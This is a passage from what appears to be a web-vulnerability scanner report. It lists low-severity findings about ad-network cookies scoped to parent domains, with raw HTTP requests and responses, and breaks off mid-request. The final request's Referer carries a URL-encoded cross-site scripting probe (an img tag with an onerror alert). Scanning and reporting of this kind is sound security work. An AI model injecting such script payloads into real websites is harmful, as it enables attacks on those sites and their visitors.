rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%265671%3D1%264210%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1%266286%3D1%266643%3D1%264212%3D1%266432%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C240%2C8%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C154%2C2%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C0%2C1%2C%2C%267727%3D14742%2C0%2C1%2C%2C%265852%3D14742%2C0%2C1%2C%2C%266286%3D14843%2C0%2C1%2C%2C%266643%3D14894%2C0%2C1%2C%2C

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:31:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%265671%3D1%264210%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1%266643%3D1%264212%3D1%266432%3D1%266286%3D1; expires=Mon, 17-Oct-2011 16:31:39 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C240%2C8%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C154%2C2%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C0%2C1%2C%2C%267727%3D14742%2C0%2C1%2C%2C%265852%3D14742%2C0%2C1%2C%2C%266286%3D14843%2C141%2C3%2C%2C%266643%3D14894%2C0%2C1%2C%2C; expires=Mon, 17-Oct-2011 16:31:39 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2132=439524AE8C6B634E021F5F7802166020; expires=Sun, 16-Sep-2012 16:31:39 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;
12.122. http://privacy.revsci.net/optout/optout.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://privacy.revsci.net
Path:   /optout/optout.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout/optout.aspx?a=1&p=http://www.networkadvertising.org&nocache=0.3478553 HTTP/1.1
Host: privacy.revsci.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: NETID01=f9891e48fd6ce58119cd075cc3adf5a4; NETSEGS_K05540=e98f30f2b8e2390e&K05540&0&4e91904a&0&&4e6c320d&239be0b9fdae6d2fbd805afcd850cfc7; NETSEGS_H07707=e98f30f2b8e2390e&H07707&0&4e8312a8&4&10921,10926,11001,11087&4e5db56e&239be0b9fdae6d2fbd805afcd850cfc7; NETSEGS_J08778=e98f30f2b8e2390e&J08778&0&4e8636da&0&&4e604379&239be0b9fdae6d2fbd805afcd850cfc7; NETSEGS_I09839=e98f30f2b8e2390e&I09839&0&4e999932&0&&4e740fed&239be0b9fdae6d2fbd805afcd850cfc7; NETSEGS_F10931=e98f30f2b8e2390e&F10931&0&4e99b65c&0&&4e73f9df&239be0b9fdae6d2fbd805afcd850cfc7; udm_0=MLv39CEJZjpv597JCM1YKC+qfowJLkXm5HzcyJTaomayNeTIOt0mZGCnnxCU3g5Fl7++17leNm8ffHAB6b/mVCtcPC0+5TNgOqGlLOcs7kcw6WMqaKWl2kIvQZjEsolL0pz4vf6LEszPlgna/4OBy5/4ZkTTspiv9Msm6hzYCWbeP2g+R5/58eVFI8tRMfSjfnQLqH0/pEMmXXwmwuU8xD+kpzoEsTO7ez5HPy5K+mbh4LfHaMsWCL+XCTKWI9cdmIHl+gVPDTgc3CK8pLaz/7jrNk0pxHNOuHrk4FVkIDy9k2EMXKHSpygrcSIf7V0cXWR0V/SY2w0OzR5WIy7wVWesqdD0kNEUpdOZDrMhImy9MetxZAY/dYUYac7pgETe1YmNjk3G1SVS5XidmU7it/alnDLr7a6rBDiERDC0Lwmk0X2/WdHopasjBk9zXTQ5vymOk6PP8fTs+kGg8y9zoCfQjEhJI59YlVgsN2RbWcLxJ2ltXPcKVi6nKjKJgsfoZVrO2oHGAsWHqCrRziso12dwImO0oREKvquBMv8eypqMG2flmwPHuOnQavYplsHHbLFAK5PxjJhvGwP6B5fMyC68hk3aZMv2Ulug8AJdqWwTKCHtI0K9vgNTLcuQSLIa0T5yNdb6h1hyeG9btd9iyQMBQ4qsMf5kv67ybYgZgigDt5iY/OiCnqWhPexftsafKgOtBMBHwSMUMJQ/2tbGafyiMt6zPL3Xz5/btLPnBQG9mxDc6ZK2l9Oy3v37eFnWjY/J3ov/3q1tBXFezOPwGquiA8AUqL7LrKghR+Rvb8j/LAEShkTECSaC+LWwnz6ocbagwIqFFnAKWAEdy5DE6GhRR4elWwss77kfDtrC2Ends9TFrD/LjKNmZnicyRiU4xlFhQDgppNnnirTaZwTFK60mrg3th0XTTpTOCw+yPFKxeD4FVhNz0FcHh6yuWmKUTkbwk318gZQDfBORxTABzOBilvBEyiOCylwVOuHpFOA1pO1YY9xpWyYg6bhGYSyukJ9jxxM1x6qhi5mLBhvo8a1HTvQTZMC0o/HK+7tLhzPdDM+hTYWisTFw8/QVkhQ+wcbbEwOxhcU73M6QervSnu/q9Dq9+72SG+a2W+PLWrKgOExYBUsBOWpfyVUCb0ASJyPeTOShSVhaQ+fCBvu3XUPxGaOzpGoVD3dQkBOpy5C+1PgxsexVbXgZjAUSQQSfBssmqLcDaVpLyxs+Qopl4Kn563r+MBJgq6zq/TwkNvi/qCkpyT863ibLn3vMNFkJ//YQej4a1f1nAYsSi+KPX8m4ccideWG+VIWkdIeml4cyFsqF+rwR7f62ebxite6HhDXOQZW7V3XjcIb99328u1In9UmhJ6IOYCM3pMZvBgFi5Bq1sp7ZGCqUTRNOzygkzeI6RIYZZ0LlAJpYUQbqlROZdomQThaWYnoIHQ3MS3AA6rHcslHFCVSAuglUFRCsjlstdv++yQ96TcbUvSKhgGjcUjJD0R6kXUu8bCV; rsiPus_GIay="MLsX8FUNJi5nYDzKoFXYD5Xqgs9Mt/zQWVmaZnsSPOV+NTAxTO25Y3T/9SQCORKEN6trqtGErYp7YMOZ4gRNmft7PvpFTCRWTeAAZOovdb2Hswki2CYStlPjDtE+QTJgyxFyb3LQbz0Q/4ASjJnYEdCYgMvPNzTQDdcRktuap7MHr33Qj7kHYZlCuhGo6u4Tf8xFAHYXSwblIXtOaCNYGnJpClQH6GxSbBZ40L5aXvMtS+lg9I0Tr72kVpPYohOUANno6wrm7VqOw5LfOAQcxCnQxU7GIQiB8QGl/+NMYJwK0KX0/59Qc0x16AazPy+DXDuG7DJ8Mt9ZdknkvrOVhmT22fDw1X5IMQpC/yyvNZkofE3w6gomw+JONvXHgJQtL7O6/NVgInSpPwwmTuIjHE1FilDtHV1c0MKpgyhxEp9goNwAYQ0etDyunPKku+ck+TMoLK6df8KR1mcnSiaWsEfTZLo89iWrcnpDvP9xNmb7dO+UD3/PdRH2tiDrBDQqZTr6j9tlNjshvU7ky7luRDMgUvLlW08opyn0lUA2NaanUIqdu1KJGEvexyQ="; rsiPus_bidr="MLsX8FUNZj5nYDzKoFXYD5XqQrD3lf1+z1kmf5BdciMmNzGYQjNHLUE0d4xc0atycnxriO/0KZsoBpFupKZeMV7PfenFRPSpJ/B4XgMSWbpi1BixTbs+6iE5ayH6sfeVBDclfcs7aQzynEzZjpFO2BifjtnrlgbTChMVuJmyxZlnZJ1Jh0NtGXm/EpSJp0omr+9GZdbSF6Lzp+fuZH/aY3FZzJ206fbqaCaoBVgjZvPh4OiipROUIctrlTKObVBANgHgHKqeOZmOp3x+/GgWJgye8kOJv4yIdxSGGqloCT5ZWYHDXabtP/R4bpW0t8lOpdx4JWr2wW0zNFFSOgvZsY+PEhbY6ZnXmCpK8FO3FiEiK8ZL/uLNwqQ/DE0LGLE8BTRtrGhYXkVbBc1I8E0+yAu8ze2P7gZb34/JRe/uGeNZI0v6jCUqtq9HmUsUN8UECWWHAJRIiM/NMGD77IG0rlwlEqETOz1Hg8WWQkD6xwHNXK1A43tBQ9JN9Egnh8Iblexu8i5FN3aBwUvFNQk730pyK5mClxbvL+KXSj44prIJw5K9W5RLXhCBHw=="; rsi_us_1000000="pUMd4z9HMAYYbm+istsgxv7+mvc+cC1B+3tY0F6r9vSLrFABPuZI6YchRbl7qd+XW2hVt/QdtrdYgNuGDVCDBRsQZctaVDqAIKiiRkGNdVfKQRM8nhjDEuJXKWPfICrLmmSRp8Mhr3ShN+eWDTnY3HJ8+VSks4XYl3avQ7Hur+r93FheUrahkUxj6ZmGZWu4dW0XBls+YrSPa+PUrAoGk1EXk81+r5BmpkCnF3yUB4TdaxjvEgFIkI/4md4hO6+dVtvUaguMpm5t+BOzorDKXqL2mGfZWjiRB/BUL10dY8QU9delsnaA3ueClTU5rQ4gMPiWxhe3k1XhHzPNuscshJdH6ut4yPA4WJvwOI0FK0U/Ny+uqFpb9WT71MQft1hknAOluSAtoVkbH9omakq+YUBLESH+2BIyUDaV4dvKJk/YmZAHcIxIbYxWZjzBS/tDDbPZDcxmiFTy7dHLj8ZQerR0v/iA/voS7SMUk2d/8fo4Uh1leIJQ+BMCZ7P1s6XLdi6X34IthsAbqidjXvWiaeSZCzLwayDDZ+WPkUaoOMWNXg2XhAtw5Kaz05to0ltFxB7FbsprP9GNc21uwNlcJK2yrt4PyiAUjRmsmn3vLo9xoADhkKtsFbCuihMj6/zbB19MExHT2BDrGqHz/rVvCWtFZmYI3+0TW8mOvFwqUtWd+Ylp0Rn4ZuPHupXFIxs49jNd2zPy+IVXKacgjpIj/K/X1IaRp+PaNRydlkyFh+SH3S/dxCBtVRtQNRXLQOOZ3SJsVqFH4wBa6pvVJ9O9oY7hiTz6dXOV0Nzf351eYHRVBy2/94rZxtGWauVgEmSWUp/fUk5/qw/Os28Kj0jvGbSL6y3Nakem+bRQy/F/a5Ukwdimx9QiY3rpIWLyMmptlSDMNxilrJvtellnbqHxJ2bVgbQGO6I2AvNjtKl4oyoIK3seOfPUtNZ3vwPyTFdA2MVJ3RB7L5DkRjAcv6RuOt8Eh5+jCwwnWcutVahdAzXkSyeu0e6zhp7BEXirYP9AgHOFqTdtU3L3UqnLDhaFzIwBsoaizXfbkdpf8y1GR0RaFtqp/IThvUXEPBxd0eZAz+V7oc9eMe0kvWilgxd0yqa8p1yB5xmxgebe9ZoXt8Hhp/CMtOxhICS7seBpKJ0Slh6tXNhg6RSXqYRbt7aS88qtdBRC9eKqnQ=="; rsi_segs_1000000=pUPFJk+B73IM1p94u+w/VXTPWv/4lqXpA6GHJmbgusJbus3Mx+p24I1oDZUZb5s27P+ai79l7ni6EqU0UjR/LajAVpfU/0/yivwWy7CCuk/LdbJkwc/2D3eg8kPC99AbBTxElA1fdUST18Pst5/sOuODR6gvBT50j9ah/ZKEkRLqz+rBietPxjUalq+Y1WWc2iBa8iLTlsKi0FbdV7pJ4k+HRzFBUr8Lfl4uOyVSHF1S51gps6VKZfxsQrxH5Z86gMsRlBeV6VKhF1jTGOkscvri6srHhhKcBMJOCCs+Ip+MEelaaYPgGsmz9cHJzB8ftFrmg/JwxNmjwluFdrKubkbynWjrrySZH9UTZSMz; NETSEGS_K08784=e98f30f2b8e2390e&K08784&0&4e99b6b4&0&&4e73fec3&239be0b9fdae6d2fbd805afcd850cfc7; rtc_ZVG6=MLvv9aMOYT5n5fgbA5zKZLneWRTAxbuxebXlxUcjzcXGSuZyPt6fFu3OMJQ9F3Bxzw8u0eGHRiclcyshyEZ1qHhG2V8spU6IKrZCkCNniKtWmluF6ggxz6ZKxwokHVbftCFbJGN72TfsNURrZAk2e/h/zok1/7Q8idLTjDR+5Sk2AB2y7X9Qvk+B1fiKnyrl4C6f7/hOPjrPVDaZ13CaSq2iUKTWvwqgILldJdo9tSxC4qdf1k8dk2ORHN7T3cnvcgo84QMYEeiYQYSD4lN4akmSTZWpOBOugeYG4CvGobmA/MZeHJxUyzUtrr9eVJGwStW4VDmUZQ1a5wqbg4F1ESMPvOjRUpJhowa6YGxLHpt79nIBj7cWDZauHEVNg3QfMOPFtBxdCcShmVlL3IjAmRwE9cfwfzHt9m3QWJmPkKoYFi+pAGIp0gYkheZGssNc9IbT/1LdfwJlijkYGYsG7RqGyN0afnD/cpHF58tM7xwNGIYH3b8KHdhadk72ovy13lJzV7JclcE61i6MgVaPbMz+FPtQT46ikQ2eEVQHnDVaRtm/qJAfsVjdWyiY6Js8fhIUbGLbaDA2hclaajEIMuQ3WRSL5cLW6NuEVTTpIv3u/65jY3rStpVD4qSM7550SPYXV3piHZb/gfYkKZ/zCOmyYbBsVXSkBU/ABGHd/GljMSOyc2muRhrqXVEsZAWXww5JbD67UOseMoVq/Glde1NTaNyFbfF3T7Nuvkerww==

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Set-Cookie: NETID01=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: NETSEGS_K05540=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: NETSEGS_H07707=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: NETSEGS_J08778=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: NETSEGS_I09839=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: NETSEGS_F10931=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GIay=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_bidr=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: NETSEGS_K08784=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_5Pgf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_QtPe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_-pls=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_BpKU=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_2mmT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_VWpZ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_MO0D=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_6FJN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_OwLs=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_6aEY=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_wk0L=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_lz28=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ADAg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_dt_u=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: NETSEGS_F09828=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_0MQb=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_O-nx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_dTM3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_0e37=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_OBX-=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_cMfn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_diSQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_FTuL=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Iryv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc__deo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_VDO5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_p4rD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_E62i=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_gguo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_1DL4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_x1cj=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Nflk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_llan=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_cb7a=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_OHDN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_lGt5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_oMIi=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_vzBk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_DiFj=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_BXlt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_3RaR=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_CD4S=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_THGT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_cpgI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Zmcn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ugQd=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_HVo3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_lrcG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_sPLC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_xNIB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_s5oP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ZICR=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_58zC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_YvdY=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_PzoB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_8aSl=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_pLLd=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_W_VD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_3AvC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_855R=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_uED1=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_2AG3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_sI9w=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Zufq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_AAAA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: NETSEGS_C07583=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_lPhe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_EdrF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: NETID01=optout; Domain=.revsci.net; Expires=Wed, 09-Sep-2043 17:15:59 GMT; Path=/
Location: http://privacy.revsci.net/optout/optoutv.aspx?cs=True&v=1&p=http%3A%2F%2Fwww.networkadvertising.org%2F
Content-Length: 0
Date: Sat, 17 Sep 2011 17:15:58 GMT

12.123. http://px.owneriq.net/naioptout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://px.owneriq.net
Path:   /naioptout

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /naioptout?nocache=0.1835902 HTTP/1.1
Host: px.owneriq.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.2.13
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Location: http://px.owneriq.net/naioptoutcheck
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Sat, 17 Sep 2011 17:19:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 17 Sep 2011 17:19:18 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ss=deleted; expires=Fri, 17-Sep-2010 17:19:17 GMT; path=/; domain=.owneriq.net
Set-Cookie: sg=deleted; expires=Fri, 17-Sep-2010 17:19:17 GMT; path=/; domain=.owneriq.net
Set-Cookie: si=deleted; expires=Fri, 17-Sep-2010 17:19:17 GMT; path=/; domain=.owneriq.net
Set-Cookie: sgeo=deleted; expires=Fri, 17-Sep-2010 17:19:17 GMT; path=/; domain=.owneriq.net
Set-Cookie: rpq=deleted; expires=Fri, 17-Sep-2010 17:19:17 GMT; path=/; domain=.owneriq.net
Set-Cookie: apq=deleted; expires=Fri, 17-Sep-2010 17:19:17 GMT; path=/; domain=.owneriq.net
Set-Cookie: oxuuid=deleted; expires=Fri, 17-Sep-2010 17:19:17 GMT; path=/; domain=.owneriq.net
Set-Cookie: gguuid=deleted; expires=Fri, 17-Sep-2010 17:19:17 GMT; path=/; domain=.owneriq.net
Set-Cookie: abuuid=deleted; expires=Fri, 17-Sep-2010 17:19:17 GMT; path=/; domain=.owneriq.net
Set-Cookie: optout=optout; expires=Tue, 19-Jan-2038 03:14:07 GMT; path=/; domain=.owneriq.net

12.124. http://r.openx.net/set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /set

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set?pid=2be5fb6c-c0d8-147f-d80c-480b0a7b0393&rtb=439524AE8C6B634E021F5F7802166020 HTTP/1.1
Host: r.openx.net
Proxy-Connection: keep-alive
Referer: http://www.gather.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p=1315756063; i=d2a43928-76cd-49ea-b899-b41fb371435f

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:32:23 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=d2a43928-76cd-49ea-b899-b41fb371435f; expires=Mon, 16-Sep-2013 16:32:23 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;
12.125. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC85/rnd/9tOMO  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/du/id/L21rdC8xL21jaHBpZC85/rnd/9tOMO

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/du/id/L21rdC8xL21jaHBpZC85/rnd/9tOMO HTTP/1.1
Host: r.turn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/426d8%3Cimg%20src%3da%20onerror%3dalert(1)%3E31b7c6065d67ada9d?recentId=1688849889241963&qualityCommentWidth=350&url=http%3A%2F%2Fwww.gather.com%2F&_=
